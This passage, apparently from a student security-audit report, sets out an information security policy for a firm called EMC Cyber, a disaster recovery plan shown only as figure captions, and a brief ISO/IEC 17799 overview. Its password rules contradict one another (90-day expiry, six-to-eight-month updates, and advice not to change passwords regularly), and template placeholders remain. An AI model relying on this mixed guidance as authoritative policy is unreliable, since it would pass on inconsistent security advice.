company are required to read this document in its entirety and sign the form attesting
that they have done so. Every year or as needed, Management will review and update
this document to reflect newly created security requirements and disseminate it to all
employees and contractors, as necessary.

Every day, EMC Cloud manages user security data. To secure them, to preserve Users'
privacy, to guarantee compliance with numerous rules, and to safeguard the
organization's future, sensitive information must have sufficient protections in place.

Every customer's privacy will be respected by EMC Cloud, and any information about
them will be shielded from prying eyes. To fulfil these commitments, management is
dedicated to keeping a secure environment in which to handle user information.
personnel handling Sensitive user information must guarantee:

Limit your personal use of the EMC Cyber information and telecommunication
systems and make sure it doesn't affect how well you do your job. The EMC Cyber

79 | P a g e
 reserves the right to monitor, access, review, audit, copy, store, or delete any security
data, equipment, systems, and network traffic for any reason.
Do not participate in any activity that is offensive, intimidating, discriminating,
defamatory, malicious, abusive, harassing, or unlawful using email, the internet, or
any other company resources.

Maintain account and password security

Before creating any new software, hardware, or third-party connections, get

management's clearance.

When leaving the computer alone, use the automated system-off feature.

Protect the details of users (yours).

Installing unlicensed software or hardware, such as wireless access points and

modems, is prohibited unless you have clear management consent.

Cybersecurity issues must be immediately reported to the person in charge of local

incident response.
We are all accountable for preventing unauthorised access to and inappropriate use of
the systems and data within our organisation.
You should consult your line manager for advice and direction if you have any
questions regarding any of the policies outlined here.

Passwords Security
Passwords must be created and managed in accordance with this section.

Password Requirements

 All user-level [Company Name] network passwords will expire every 90 days and
must be changed.
 New passwords cannot be the same as the previous four passwords.
 Passwords must be at least eight characters in length. Longer is better.

80 | P a g e
  Passwords must contain both uppercase and lowercase characters (e.g., a-z and A-Z).
 Passwords must contain at least one number (e.g., 0-9).
 Accounts shall be locked after six failed login attempts within 30 minutes and shall
remain locked for at least 30 minutes or until the System Administrator unlocks the
account.

Some [EMC CYBER] systems need the Technology Department to give the user a new
temporary password to unlock an account or change a password without signing in.
Passwords must be given verbally in such circumstances, and the user must sign in right away
and update the account password.

Passwords should not be disclosed to anybody, even IT support staff, unless the IT Security
Specialist has given permission.

All passwords must be handled with the utmost care and confidentiality. If someone asks you
for your password(s), please tell them you are not allowed to do so by [EMC CYBER] policy
and let them know to get in touch with the IT Security Specialist. Change any associated
passwords and report the situation right once if you believe an account or password has been
hacked.

Password cracking or guessing may be carried out periodically or arbitrarily by the

Technology Department or approved outside "penetration testers" to test the security of the
[EMC CYBER] network. The user will be prompted to reset their password if theirs is
guessable or broken during one of these checks. Anyone other than the Technology
Department or an authorised outside auditor is not permitted to attempt to guess or crack
passwords.

Protective Measures
1) Do not share EMC Cyber passwords with anyone, including administrative assistants
or secretaries. All passwords are to be treated as sensitive, confidential EMC
information.
2) Passwords should never be written down or stored on-line without encryption.
3) Do not reveal a password in email, chat, or other electronic communication.
4) Do not speak about a password in front of others.
5) Do not hint at the format of a password (e.g., “my family name”).
6) Do not reveal a password on questionnaires or security forms.
7) If someone demands a password, refer them to this document and direct them to the

81 | P a g e
 8) IT Department.
9) Always decline the use of the “Remember Password” feature of applications.

Email

Use of the EMC Cyber e-mail system is prohibited for the creation or dissemination of any
disruptive or offensive communications, including pornographic material, derogatory remarks
regarding race, gender, age, sexual orientation, impairments, and religious practises.
Employees should notify their supervisor right once if they receive any emails with this
information from any EMC Cyber personnel. There are no exceptions to the outright ban on
the following actions:

1) Sending unsolicited email communications, such as "junk mail" or other promotional

materials to people who haven't expressly asked for them (email spam).
2) Any type of email, phone, or paging harassment, regardless of the content, regularity,
or volume of communications.
3) Requesting email at any address other than the account of the poster with the goal to
harass or gather responses.
4) The unauthorised use or falsification of email header data.
5) Using a wide number of Usenet newsgroups to distribute identical or similar non-
business-related communications (newsgroup spam)

Use of EMC Cyber resources for personal use is permitted in moderation; nevertheless, no
work-related emails may be kept in a folder apart from those for that purpose.

It is forbidden to send chain letters or humorous emails from an EMC Cyber Server email
address. Before sending, virus or other malware alerts and bulk mailings from unapproved
sources must be cleared by the EMC Cyber IT department. The forwarding of mail that an
employee of EMC Cyber receives is likewise subject to these limitations.

Email Security Measures

 EMC Cyber employees must Train on email security best practices.

 Create strong passwords.
 Don't reuse passwords across accounts.
 Consider not changing passwords regularly.
 Use multifactor authentication (MFA).
 Take phishing seriously.

82 | P a g e
  Be wary of email attachments.
 Don't click email links.
 Don't use business email for personal use and vice versa.
 Avoid public Wi-Fi.
 Use email security protocols and tools.

Network and Server Security

The system must be updated with the most recent security patches as soon as it is practicable,
except for situations were doing so would conflict with operational needs.

Physically, servers should be situated in an area with access controls.

It is expressly forbidden to run servers from unsupervised cubicle spaces.

Network Administration will assess each discrepancy and take appropriate action.

The Information Security Office publishes updates to network device operating systems
and/or configuration settings that adhere to Company requirements. Within the time range
specified by the Information security Office, updates must be implemented.

Before being connected to the network, all network device settings must meet the
requirements outlined in the EMC Cyber setup handbook. This document has been used to
develop a boilerplate configuration that will be applied to each network device before it is
connected to the network.

Server Malware Protection

Anti-Virus - All servers MUST have an anti-virus application installed that offers real-time
scanning protection to fi les and applications running on the target system if they meet one or
more of the following conditions:

 Non-administrative users can access the Internet remotely.

 The device is a file server
 Systems used by non-administrative users can access this server's shares.
 The Internet offers unfettered HTTP/FTP access

Anti-Virus for Mail Servers: If the target system is a mail server, it MUST contain an internal
or external anti-virus scanning programme that scans every mail going to and from the mail

83 | P a g e
server. If an external anti-virus programme is still scanning incoming emails when the backup
is being done, local anti-virus scanning programmes MAY be deactivated during backups.

Acceptable use
The Management does not want to impose limitations that are at odds with the Organization's
long-standing culture of openness, trust, and honesty. The management team is dedicated to
defending the company from improper or harmful behaviour by people who may do so
intentionally or unintentionally.

 Employees must use sound judgement when determining whether personal usage is
appropriate.
 For the usage of technology, employees should make sure they have the necessary
credentials and are verified.
 Employees are required to take all reasonable precautions to avoid unauthorised
access to sensitive information, including cardholder data.
 Employees are responsible for ensuring that technologies are employed and set up in
proper network locations.
 A password-protected screensaver with an automated activation function set to 10
minutes or less should be used to safeguard all PCs, laptops, and workstations.
Alternatively, users should log out when leaving their computers unattended. Caution
should be used since information on portable laptops is particularly sensitive.
 Unless overruled by departmental or group policy, all PCs, laptops, and workstations
used by the employee and linked to the EMC Cyber network, whether owned by the
employee or EMC Cyber, should be continuously executing certified virus-scanning
software with a current virus database.
 Employees must exercise great caution when opening email attachments from
unfamiliar senders as they can include Trojan horse malware, viruses, or email
bombs.
 Do not share accounts and keep your passwords private. Password and account
security is the responsibility of authorised users. User level passwords should be
updated every six to eight months, while system level passwords should be changed
every quarter.

84 | P a g e
Physical access
 The use of physical security systems is subject to all existing laws, including but not
limited to building and fire safety standards.
 All (EMC Cyber) restricted facilities' physical access must be tracked and regulated.
 Physical protection of all Cyber Security facilities must be proportionate to the
significance or criticality of their function at (EMC Cyber).
 Only (EMC Cyber) support staff and contractors whose job duties necessitate access
to that facility may be permitted access to Cyber Security facilities.
 Every facility entry that may be used by unauthorised people has to be guarded.
 To lessen the dangers from environmental concerns and chances for unwanted
entrance, secure locations must be guarded. To prevent the possibility of information
being observed by unauthorised people while in use, information processing facilities
handling sensitive information should be strategically placed.
 To reduce the danger of possible physical and environmental risks, measures should
be implemented.
 It is important to keep an eye on environmental factors that might harm the
functioning of information processing facilities, such as temperature and humidity.
 Directories and internal phone books that provide the locations of facilities that
process sensitive information should not be easily accessible to unauthorised parties.
 Equipment must be safeguarded from blackouts and other disturbances brought on by
utility faults.
 Locations with restricted access must not have any signs or other indicators of the
location's significance.
 A sign-in/sign-out record will be used to keep track of visitor access at all EMC
Cyber Security locations that permit visitors.
 Depending on the importance of the information resources being safeguarded, card
access records and visitor logs for EMC Cyber security facilities must be retained for
routine examination.
 Visitors must always be escorted by authorised employees when in controlled areas of
EMC Cyber Security establishments.
 The team in charge of managing the facility's physical security must periodically
analyse its visitor and access logs and investigate any suspicious activity

85 | P a g e
Disciplinary Measures

Employees who violate the standards, rules, and procedures outlined in this document will
face disciplinary action, which may range from warnings or reprimands to termination of
employment. Claims of ignorance, sincerity, or employing bad judgement won't be accepted
as justifications for breaking the law.

4.2 Develop and present a disaster recovery plan for EMC Cyber according to the
ISO/IEC 17799:2005 or similar standard which should include the main components of
an organizational disaster recovery plan with justifications. Discuss how critical the
roles of the stakeholders in the organization to successfully implement the security
policy and the disaster recovery plan you recommended as a part of the security audit.

EMC Cyber – Disaster Recovery Plan

Figure 12 DRP

86 | P a g e
Figure 13 DRP contents

Figure 14 DRP company intro

87 | P a g e
Figure 15 Disaster

88 | P a g e
Figure 16 Disaster recovery plan

Figure 17 DRP

89 | P a g e
Figure 18 EMC Cyber - DRP

Figure 19

90 | P a g e
Figure 20

Figure 21 RTO and RPO

91 | P a g e
Figure 22

Figure 23

92 | P a g e
Figure 24

Figure 25 Stakeholders

93 | P a g e
Figure 26 Types of stakeholders

Figure 27 Internal stakeholder

94 | P a g e
Figure 28 Employee

Figure 29 Owner

95 | P a g e
Figure 30 Manager

Figure 31 External stakeholders

96 | P a g e
Figure 32 Customer

Figure 33 Suppliers

97 | P a g e
Figure 34 Governments

Figure 35 Community

98 | P a g e
Figure 36 The end

ISO/IEC 17799:2005
For establishing, implementing, maintaining, and enhancing information security
management in an organisation, ISO/IEC 17799:2005 lays forth broad concepts and
standards. The aims listed offer basic direction on the acknowledged objectives of
information security management. Information security management is covered by ISO/IEC
17799:2005's best practises for control goals and controls in the following areas:

 security policy
 organization of information security
 asset management
 human resources security
 physical and environmental security
 communications and operations management
 access control
 information systems acquisition, development, and maintenance
 information security incident management
 business continuity management

99 | P a g e
  compliance.

The ISO/IEC 17799:2005 control goals and controls are meant to be put into practise in order
to fulfil the needs determined by a risk assessment. The goal of ISO/IEC 17799:2005 is to
serve as a common foundation and useful manual for creating organisational security
standards and efficient security management procedures, as well as to promote trust in
interorganizational operations.

References
https://www.iso.org/standard/39612.html – ISO

https://cloudian.com/guides/disaster-recovery/4-disaster-recovery-plan-examples-and-10-
essential-plan-items/#micro-focus – DRP

https://en.wikipedia.org/wiki/Security_policy - Security policy

https://www.getastra.com/blog/security-audit/it-security-audit/amp/?
gclid=Cj0KCQjwy5maBhDdARIsAMxrkw2ROPYo9umP6plmmIbDc11Q7qL90Qr5sbKWT
ci3-x6Mx9gfFxemKHAaAvQIEALw_wcB – Security audit

100 | P a g e
https://www.techtarget.com/searchnetworking/definition/network-management-
system#:~:text=A%20network%20management%20system%20(NMS,and%20performs
%20several%20key%20functions. – Network management system

https://www.sciencedirect.com/topics/computer-science/security-procedure#:~:text=A
%20security%20procedure%20is%20a,to%20accomplish%20an%20end%20result. – security
procedure

101 | P a g e